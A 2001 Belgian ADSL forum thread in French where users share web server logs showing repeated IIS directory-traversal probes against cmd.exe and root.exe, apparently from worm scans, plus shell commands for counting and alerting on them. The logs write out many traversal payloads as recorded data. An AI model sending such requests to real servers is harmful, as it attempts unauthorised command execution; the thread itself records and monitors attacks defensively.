ADSL-BC

un forum sur l'ADSL en Belgique

Accéder au contenu

Log bizarre de IIS (www)

Ici on parle de sécurité. Venez donc poser vos questions ou proposer vos solutions.

Modérateur: Barbapapa

Publier une réponse

Message par Gilbert » 04 Déc 2001 23:27

SAlut Zorglub,

T'en fait pas:

213.48.151.10 - - [02/Dec/2001:20:04:56 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:34 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:38 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:42 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:45 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:48 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:51 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:53 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:56 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:02 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:00 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:04 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:07 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:10 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:17 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:17 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:20 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:35 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:51 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:51 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:51 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:51 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:51 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:53 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:53 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:53 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:26 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:27 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:27 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:27 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:27 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:27 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:28 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:28 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:28 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:28 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:28 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:29 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:29 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:29 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:29 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:29 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
si4001.inktomi.com - - [04/Dec/2001:03:21:09 +0100] "GET /robots.txt HTTP/1.0" 200 147 130 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si4001.inktomi.com - - [04/Dec/2001:03:21:16 +0100] "GET / HTTP/1.0" 200 1151 60 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:21 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:33 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:36 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:40 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:43 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:46 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:49 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:52 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:55 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:58 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:50:07 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:04:56 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:02 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:07 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:12 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:17 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:22 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:27 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:32 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:37 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:42 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:47 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:52 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:57 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:06:02 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:06:07 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:06:12 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
si4000.inktomi.com - - [04/Dec/2001:09:41:17 +0100] "GET /robots.txt HTTP/1.0" 200 147 10 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si4000.inktomi.com - - [04/Dec/2001:09:41:17 +0100] "GET /robots.txt HTTP/1.0" 200 147 10 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si4000.inktomi.com - - [04/Dec/2001:09:41:18 +0100] "GET / HTTP/1.0" 200 1151 40 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si4000.inktomi.com - - [04/Dec/2001:09:41:18 +0100] "GET / HTTP/1.0" 200 1151 0 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
213.208.1.25 - - [04/Dec/2001:10:47:59 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:04 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:09 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:14 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:18 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:23 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:28 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:33 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:37 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:42 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:47 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:52 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:56 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:49:01 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:49:06 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:49:11 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:08 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:13 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:18 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:23 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:27 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:33 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:37 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:42 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:47 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:52 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:57 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:23:02 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:23:07 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:23:12 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:23:17 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:23:22 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
si3002.inktomi.com - - [04/Dec/2001:11:50:24 +0100] "GET /robots.txt HTTP/1.0" 200 147 0 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si3002.inktomi.com - - [04/Dec/2001:11:51:51 +0100] "GET /robots.txt HTTP/1.0" 200 147 0 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si3003.inktomi.com - - [04/Dec/2001:13:03:14 +0100] "GET /robots.txt HTTP/1.0" 200 147 0 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si3003.inktomi.com - - [04/Dec/2001:13:04:26 +0100] "GET /robots.txt HTTP/1.0" 200 147 10 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si3003.inktomi.com - - [04/Dec/2001:13:04:27 +0100] "GET / HTTP/1.0" 200 1151 10 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si3003.inktomi.com - - [04/Dec/2001:13:04:35 +0100] "GET / HTTP/1.0" 200 1151 0 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
cf4-e3.par.libertysurf.net - - [04/Dec/2001:16:06:26 +0100] "GET /taichi/taichi.htm HTTP/1.0" 200 6186 140 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; FREE; KITV4 Wanadoo)"
ALagny-102-1-3-18.abo.wanadoo.fr - - [04/Dec/2001:20:01:27 +0100] "GET /taichi/taichi.htm HTTP/1.1" 200 6186 0 "http://search.ke.voila.fr/S/wanadoo?gb=site&dt=*&cid=wng&kw=mouvement+tai+chi+chuan&cid=wng" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Wanadoo 5.3)"
213.29.22.53 - - [04/Dec/2001:21:24:16 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"

Tu vois que ce n'est pas mieux :sad:
@+

Gilbert
Avatar de l’utilisateur
Gilbert
Casimir Team
Casimir Team
 
Message(s) : 4090
Inscription : 11 Juin 2001 02:00
Localisation : Uccle, Bruxelles
Haut

Message par Zion » 04 Déc 2001 23:45

Je m'etais fais un script pour me prevenir de chaque attaque moi... Et pour finir, j'avais 20-30 mails chaque matin, grave!
Avatar de l’utilisateur
Zion
Casimir Team
Casimir Team
 
Message(s) : 4863
Inscription : 18 Juin 2001 02:00
Haut

Message par max » 05 Déc 2001 00:28

# zgrep -c "cmd.exe" /var/log/apache/access.log*
access.log:115
access.log.0:255
access.log.1.gz:991
access.log.2.gz:829
access.log.3.gz:2304
access.log.4.gz:1467
access.log.5.gz:1683
access.log.6.gz:1353
access.log.7.gz:986
access.log.8.gz:1066
access.log.9.gz:922
access.log.10.gz:4585

access.log.10, c'est aout-septembre, quand la majorite des IIS n'etait pas patche.

Encore qque mois, et ca ne sera plus qu'un mauvaise souvenir :smile: (et il y a aura un nouveau truc plus vicieux encore :sad: )

_________________
L'Adsl sous Linux
Imagehttp://linux.adsl-bc.org

<font size=-1>[ Ce Message a été édité par: max le 2001-12-04 23:29 ]</font>
Avatar de l’utilisateur
max
Barbapapa Team
Barbapapa Team
 
Message(s) : 8772
Inscription : 10 Juin 2001 01:58
Localisation : fr_BE.UTF8@euro
Haut

Message par Flynux » 05 Déc 2001 06:10

tail -f /var/lib/apache/logs/access_log|while read f;do if echo $f|grep "skynet.*cmd";then echo $f|mail -s "log apache no comment" [email protected];fi;done
Avatar de l’utilisateur
Flynux
Membre
Membre
 
Message(s) : 41
Inscription : 24 Août 2001 02:00
Haut

Message par Invité » 05 Déc 2001 12:26

Puis après, c'est skynet qui va écrire au abuse@ de ton ISP pour avoir abusé de leur [email protected] =)
Invité
 
Haut
Précédent
Publier une réponse

Retour vers Sécurité

Qui est en ligne ?

Utilisateur(s) parcourant ce forum : Aucun utilisateur inscrit

Forum sur l'ADSL et les connexions large bande en Belgique depuis 2001